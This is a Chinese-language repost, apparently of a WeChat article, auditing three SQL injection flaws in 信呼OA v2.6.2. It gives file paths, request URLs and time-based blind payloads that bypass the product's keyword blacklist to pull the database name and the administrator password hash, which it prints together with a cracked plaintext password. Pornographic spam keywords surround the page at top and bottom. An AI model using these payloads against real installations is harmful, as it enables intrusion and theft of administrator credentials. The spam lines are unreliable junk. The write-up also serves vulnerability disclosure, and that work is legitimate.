欧美日韩一级黄色录像免费观看 ,三级精品久久精品三级,日韩久久综合一二三级

信呼OA_V2.6.2_SQL注入漏洞

當(dāng)前位置：點(diǎn)晴教程→點(diǎn)晴OA辦公管理信息系統(tǒng) →『經(jīng)驗(yàn)分享&問題答疑』

admin

2025年5月28日 19:18 本文熱度 648

No.1

SQL注入-1

代碼審計(jì)

漏洞點(diǎn)出在

/webmain/flow/input/mode_gongAction.php

下的 submittoupiaoAjax 方法

可以發(fā)現(xiàn)它對(duì)傳入?yún)?shù)沒有進(jìn)行任何的過濾便拼接執(zhí)行 SQL 注入

（PS：雖然 get 和 post 請(qǐng)求進(jìn)行了全局過濾，但過濾不嚴(yán)可以繞過）

url：

http://localhost/index.php?a=submittoupiao&m=mode_gong|input&d=flow&ajaxbool=true&mid=3&sid=1&modenum=1

通過跟蹤 SQL 執(zhí)行，可以看到實(shí)際上執(zhí)行的是以下 sql 語句

update `xinhu_infors` set `touci`=`touci`+1 where `mid`=3 and `id` in(1)

其中 $mid 和 $sid 我們都可以進(jìn)行注入，此處我選擇 $mid 進(jìn)行注入

不過它 get 和 post 傳參過濾了很多參數(shù)（已經(jīng)喪心病狂到影響內(nèi)容的程度了...）

select,alter,delete,drop,update,/*,*/,insert,from,time_so_sec,convert,from_unixtime,unix_timestamp,curtime,time_format,union,concat,information_schema,group_concat,length,load_file,outfile,database,system_user,current_user,user(),found_rows,declare,master,exec,(),select*from,select

但黑名單總是不如白名單的，所以簡(jiǎn)單 bypass 下得出以下 poc

3||if(ascii(substr((select(database())),1,1))=114,benchmark(666666666,1),0)#

嘗試注出當(dāng)前數(shù)據(jù)庫名

3||if(ascii(substr((select(database())),1,1))=114,benchmark(666666666,1),0)#

第一個(gè)字符為 r

3||if(ascii(substr((select(database())),2,1))=110,benchmark(666666666,1),0)#

3||if(ascii(substr((select(database())),2,1))=111,benchmark(666666666,1),0)#

第二個(gè)字符為 o

最后注入出當(dāng)前數(shù)據(jù)庫為 rockxinhu

除此之外，使用以下 poc 還可以注出管理員密碼：

/index.php?a=submittoupiao&m=mode_gong|input&d=flow&ajaxbool=true&mid=0||IF(ASCII(SUBSTR((SELECT(pass)FROM(`xinhu_admin`)WHERE(id=1)),1,1))=98,BENCHMARK(666666666,1),0)#&sid=1&modenum=1

No.2

SQL注入-2

代碼審計(jì)

漏洞點(diǎn)出在

/webmain/flow/input/mode_knowtraimAction.php

下的 biaoshiAjax 方法

可以發(fā)現(xiàn)它對(duì)傳入?yún)?shù)沒有進(jìn)行任何的過濾便拼接執(zhí)行 SQL 注入

url：

http://localhost/index.php?d=flow&m=mode_knowtraim|input&a=biaoshi&ajaxbool=trueupdate `xinhu_knowtrais` set`kssdt`=null,`ksedt`=null,`fenshu`='0',`kstime`='0',`isks`='0',`tkids`=null,`dyids`=null,`dyjgs`=null where `id` in(1) and `mid` in(select `id` from`[Q]knowtraim` where `state`<>

通過跟蹤 SQL 執(zhí)行，可以看到實(shí)際上執(zhí)行的是以下 sql 語句

其中 $fid 我們可以進(jìn)行注入

select,alter,delete,drop,update,/*,*/,insert,from,time_so_sec,convert,from_unixtime,unix_timestamp,curtime,time_format,union,concat,information_schema,group_concat,length,load_file,outfile,database,system_user,current_user,user(),found_rows,declare,master,exec,(),select*from,select*

bypass 下得出以下 poc

1)&&IF(1=1,BENCHMARK(666666666,1),0)#

嘗試注出管理員密碼

1)&&IF(ascii(substr((select(pass)from(`xinhu_admin`)where(id=1)),1,1))=98,BENCHMARK(666666666,1),0)#

得到第一個(gè)字符為 'b

1)&&IF(ascii(substr((select(pass)from(`xinhu_admin`)where(id=1)),2,1))=98,BENCHMARK(666666666,1),0)#

1)&&IF(ascii(substr((select(pass)from(`xinhu_admin`)where(id=1)),2,1))=49,BENCHMARK(666666666,1),0)#

得到第二個(gè)字符為 '1

最后得到管理員的密碼為：b13d93cd920d4155634eae0cc2e71c78

解密后是：Aa635241

No.3

SQL注入-3

代碼審計(jì)

漏洞點(diǎn)出在

/webmain/flow/input/mode_userAction.php

下的 editsuperAjax 方法

可以發(fā)現(xiàn)它對(duì)傳入?yún)?shù)沒有進(jìn)行任何的過濾便拼接執(zhí)行 SQL 注入

url：

http://localhost/index.php?d=flow&m=mode_user|input&a=editsuper&ajaxbool=true

通過跟蹤 SQL 執(zhí)行，可以看到實(shí)際上執(zhí)行的是以下 sql 語句

update `xinhu_admin` set `superid`='1',`superman`='1' where `id` in(1) and idnot in(1)

其中 $sid 和 $xid 我們都可以進(jìn)行注入，此處我選擇 $xid 進(jìn)行注入

不過它 get 和 post 傳參過濾了很多參數(shù)（已經(jīng)喪心病狂到影響內(nèi)容的程度了...）

select,alter,delete,drop,update,/*,*/,insert,from,time_so_sec,convert,from_unixtime,unix_timestamp,curtime,time_format,union,concat,information_schema,group_concat,length,load_file,outfile,database,system_user,current_user,user(),found_rows,declare,master,exec,(),select*from,select*

但黑名單總是不如白名單的，所以簡(jiǎn)單 bypass 下得出以下 poc

1)&&IF(1=1,BENCHMARK(666666666,1),0)#

嘗試注出當(dāng)前數(shù)據(jù)庫

1)&&IF(ASCII(SUBSTR(DATABASE(),1,1))=114,BENCHMARK(666666666,1),0)#

得到第一個(gè)字符為 'r'

1)&&IF(ASCII(SUBSTR(DATABASE(),2,1))=114,BENCHMARK(666666666,1),0)#

1)&&IF(ASCII(SUBSTR(DATABASE(),2,1))=111,BENCHMARK(666666666,1),0)#

得到第二個(gè)字符為 'o

最后得到當(dāng)前數(shù)據(jù)庫為：rockxinhu

No.4

網(wǎng)安溝通交流群

閱讀原文：https://mp.weixin.qq.com/s/DTLPhx7tuKgsu3i_Cz6GYw

該文章在 2025/5/29 11:40:29 編輯過

關(guān)鍵字查詢

SQL

注入

漏洞

相關(guān)文章

正在查詢...

點(diǎn)晴ERP是一款針對(duì)中小制造業(yè)的專業(yè)生產(chǎn)管理軟件系統(tǒng),系統(tǒng)成熟度和易用性得到了國(guó)內(nèi)大量中小企業(yè)的青睞。

點(diǎn)晴PMS碼頭管理系統(tǒng)主要針對(duì)港口碼頭集裝箱與散貨日常運(yùn)作、調(diào)度、堆場(chǎng)、車隊(duì)、財(cái)務(wù)費(fèi)用、相關(guān)報(bào)表等業(yè)務(wù)管理，結(jié)合碼頭的業(yè)務(wù)特點(diǎn)，圍繞調(diào)度、堆場(chǎng)作業(yè)而開發(fā)的。集技術(shù)的先進(jìn)性、管理的有效性于一體，是物流碼頭及其他港口類企業(yè)的高效ERP管理信息系統(tǒng)。

點(diǎn)晴WMS倉儲(chǔ)管理系統(tǒng)提供了貨物產(chǎn)品管理,銷售管理,采購管理,倉儲(chǔ)管理,倉庫管理,保質(zhì)期管理,貨位管理,庫位管理,生產(chǎn)管理,WMS管理系統(tǒng),標(biāo)簽打印,條形碼,二維碼管理,批號(hào)管理軟件。

點(diǎn)晴免費(fèi)OA是一款軟件和通用服務(wù)都免費(fèi)，不限功能、不限時(shí)間、不限用戶的免費(fèi)OA協(xié)同辦公管理系統(tǒng)。

日韩欧美人妻无码精品白浆,www.大香蕉久久网,狠狠的日狠狠的操,日本好好热在线观看

信呼OA_V2.6.2_SQL注入漏洞